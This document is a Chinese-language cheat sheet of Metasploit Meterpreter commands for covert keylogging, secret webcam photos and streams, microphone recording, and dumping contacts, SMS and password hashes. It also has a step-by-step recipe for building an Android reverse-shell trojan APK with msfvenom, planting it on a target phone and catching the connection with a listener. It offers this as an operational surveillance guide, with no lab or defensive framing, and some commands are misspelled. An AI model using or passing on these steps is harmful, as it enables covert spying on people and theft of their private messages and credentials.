keyscan_start:开始键盘记录
keyscan_dump:下载键盘记录
keyscan_stop:结束键盘记录
record_mic:录制声音(如果目标主机上有话筒的话)
webcam_chat:查看摄像头接口
webcam_stream //开启摄像头
webcam_list:查看摄像头列表
webcam_snap //隐秘拍照功能
webcam_snap 隐秘拍照功能 -i 1 或者2是开启前置摄像头和后置摄像头的
run vnc:开启远程桌面
dump_contacts //导出电话号码
dump_sms //导出信息
enumdesktops -->列出所有可访问的桌面和窗口站(窗体列表)
getdesktop -->得到当前的Meterpreter桌面
idletime -->返回秒远程用户已经闲置数量
keyscan_dump -->转储按键缓冲(下载键盘记录)
keyscan_start -->开始捕获击键(开始键盘记录)
keyscan_stop -->停止捕获击键(停止键盘记录)
screenshot -->抓取交互式桌面截图(当前操作界面截图一张)
setdesktop -->改变meterpreters当前桌面
uictl -->控制一些用户界面组件(获取键盘、鼠标控制权)
使用uictl -h 查看帮助(打开/关闭,键盘/鼠标)
PS:键盘记录注意点,先开始,后下载,再结束,否则会出错
摄像头:Stdapi: Webcam Commands(摄像头命令)
record_mic -->X秒从默认的麦克风record_mic音频记录(音频录制)
webcam_chat -->开始视频聊天(视频,对方会有弹窗)
webcam_list -->单摄像头(查看摄像头列表)
webcam_snap -->采取快照从指定的摄像头(摄像头拍摄一张照片)
webcam_stream -->播放视频流从指定的摄像头(开启摄像头监控)
其他命令操作
getsystem -->获取高权限
hashdump -->获取当前用户hash
msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R >
/root/apk.apk
-p 指定payload r指定存放路径
木马生成好了之后上传到目标手机上
msfconsole
然后启动msf:msfconsole 然后输入命令:
1.use exploit/multi/handler //加载模块
2. set payload android/meterpreter/reverse_tcp //选择Payload
3.show options //查看参数设置
这个payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444 现在我们来更改设置
1.set LHOST 192.168.1.114 //这里的地址设置成我们刚才生成木马的IP地址
2.set LPORT 5555 //这里的端口设置成刚才我们生成木马所监听的端口
3.run //开始执行漏洞 开始监听,等待手机上线
查看摄像头个数:webcam_list
下载短信:dump_sms
查看手机版本:sysinfo
拍照:webcom_suap -i 1 (1是后摄)
重新连接:run
webcam_stream -i 1 开启视频,1是后摄